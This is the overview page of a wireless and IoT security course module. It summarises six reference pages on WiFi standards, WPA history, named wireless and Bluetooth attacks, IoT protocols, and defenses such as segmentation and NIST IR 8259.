6
Reference pages
3
Wireless stacks (WiFi, BT, IoT)
1
Handshake capture lab
Wireless and IoT are the network you can't see — and increasingly, the network you can't avoid. A 2024 enterprise has more WiFi clients than wired ones, more BLE peripherals than USB ones, and a building full of IoT (cameras, badge readers, HVAC controllers, printers, projectors, smart TVs) that most security teams don't even inventory.
This module covers the protocols, the attacks that target each one, and the defenses that actually work. The goal is dual fluency: enough to talk credibly with a wireless or IoT engineer, evaluate an enterprise WiFi or IoT proposal, and know what to demand of vendors when their hardware lands on your network.
12.A
Reference pages
12.01
Live
→
12.02
Live
→
12.03
Live
→
12.04
Live
→
12.05
Live
→
12.06
Live
→
WiFi Fundamentals · 802.11, channels, the 2.4/5/6 GHz radio reality
802.11 standards from a/b/g through Wi-Fi 7. Channels, frequencies, BSS/ESS/SSID/BSSID, the management frames (beacons, probes, associations) that drive every attack on the next page. Why "5 GHz is just faster" misses the point.
WPA Evolution · WEP → WPA → WPA2 → WPA3
The encryption history that everyone in security needs to know cold. The 4-way handshake. WPA3's SAE (Dragonfly) and what it fixed. PSK vs Enterprise (802.1X/EAP). Why WPS is forbidden. Opportunistic Wireless Encryption.
Wireless Attacks · Evil twins, deauth, KRACK, PMKID
The actual offense: evil twin APs, deauthentication floods, KRACK, PMKID-based offline cracking, war driving with Wigle, rogue APs, Pixie Dust against WPS, captive portal phishing. Each attack with the prerequisite, the move, and the defense.
Bluetooth Security · Classic vs BLE, pairing, the named attacks
Bluetooth Classic versus BLE, the four pairing modes (Just Works, Passkey, OOB, Numeric Comparison), and the named attacks: BlueBorne, KNOB, BIAS, BlueSmacking, BLE eavesdropping. Why your AirPods are doing more cryptography than you think.
The IoT Landscape · Zigbee, Z-Wave, LoRaWAN, MQTT, Matter
The constrained-device problem: kilobytes of RAM, no full TLS stack, often no firmware update path. Zigbee, Z-Wave, LoRaWAN, Thread, Matter, and the application-layer protocols (MQTT, CoAP) that ride on top. Why "just put a cert on it" doesn't work.
IoT Threats & Defenses · Mirai to Matter
Mirai and the botnet era of default credentials. Shodan as a recon weapon. Firmware extraction and analysis. The defenses that actually work: VLAN segmentation, OTA updates, certificate provisioning, NIST IR 8259, the EU Cyber Resilience Act.
12.B